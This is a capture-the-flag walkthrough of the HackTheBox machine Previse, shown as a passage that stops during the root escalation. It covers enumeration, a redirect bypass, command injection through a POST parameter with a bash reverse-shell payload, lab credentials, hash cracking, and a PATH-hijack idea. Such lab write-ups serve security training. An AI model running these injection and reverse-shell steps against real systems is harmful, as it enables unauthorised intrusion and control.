HackTheBox — Previse

5 min readJan 26, 2022

We start with nmap to discover open ports and services.

Nmap Scan

nmap -sC -sV -oA previse 10.10.11.104

Starting Nmap 7.80 ( https://nmap.org ) at 2021-08-13 12:08 EET
Nmap scan report for 10.10.11.104
Host is up (0.21s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 53:ed:44:40:11:6e:8b:da:69:85:79:c0:81:f2:3a:12 (RSA)
|   256 bc:54:20:ac:17:23:bb:50:20:f4:e1:6e:62:0f:01:b5 (ECDSA)
|_  256 33:c1:89:ea:59:73:b1:78:84:38:a4:21:10:0c:91:d8 (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
| http-cookie-flags: 
|   /: 
|     PHPSESSID: 
|_      httponly flag not set
|_http-server-header: Apache/2.4.29 (Ubuntu)
| http-title: Previse Login
|_Requested resource was login.php
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

We have two open ports, ssh on 22 and http on 80, and their versions have no serious vulnerabilities.

So lets enumerate http port.

Enumerating HTTP

Going to http://10.10.11.104 redirects us to http://10.10.11.104/login.php

The page ends with .php, we know it’s a php app, so when we run a directory bruteforcer we need to specify .php extension.

I tried loggin in with admin:admin, admin:password and tried simple login bypass test’ or 1=1 — — but nothing worked.

So i launched gobuster with raft-medium-words.txt from Seclist gobuster dir -u http://10.10.11.104/ -w raft-medium-words.txt -t 100 -x php -b 404,403

When i try to access any of these files it redirects me to login.php. BUT when i intercept the request before redirecting, it says 302 Found but i can see the content of the page.

Lets visit /accounts.php

As you can see we can create a new user by submitting the same data as the form has, so to create a new user we need to send a POST request to /accounts.php with POST parameters username and password and confirm.

Now we have a new user embo1:embo1 lets login with it.

And we are logged in. There is SITEBACKUP.ZIP file and a user newguy in FILES page, lets download it.

As the file name says, it’s the backup of the web site.

The config.php file contains mysql credentials.

root:mySQL_p@ssw0rd!:)

In logs.php file it uses exec function on the POST parameter delim directly without validation.

So we can intercept the request and do something like this delim=space;whoami, but it will not reflect in the response so lets try ping our machine delim=space;ping -c1 <Our IP> (Don't forget to URL encode) and run tcpdump to capture it sudo tcpdump -n -i tun0 icmp

And we received ICMP echo request, now we have command execution lets get a shell on the box.

Initial Foothold

Lets replace the ping command with a reverse shell and run a netcat listener. delim=space;bash -c 'bash -i >& /dev/tcp/<IP>/<PORT> 0>&1'

We reveiced a connection and we are on the box as www-data.

Getting User

After some enumeration i couldn’t find anything but remember the mysql credentials we got before? lets login to mysql using root:mySQL_p@ssw0rd!:)

I found accounts table inside previse database that contains m4lwhere md5crypt hash.

lets save the hash to a file to crack it with hashcat or john. hashcat -m 500 hash.txt rockyou.txt OR john hash.txt --wordlist=/opt/rockyou.txt --format=md5crypt I use hashcat on my windows host because it's much faster than john.

$1$≡ƒºéllol$DQpmdvnb7EeuO6UaqRItf.:ilovecody112235!

Now we have m4lwhere:ilovecody112235! lets ssh into the machine (or just use **su m4lwhere — **).

Getting Root

By running sudo -l we can run /opt/scripts/access_backup.sh as root.

Looking at the script, it’s running gzip without specifying the full path, means we can modify the $PATH variable to make it search for gzip in another directory where we have our own gzip script.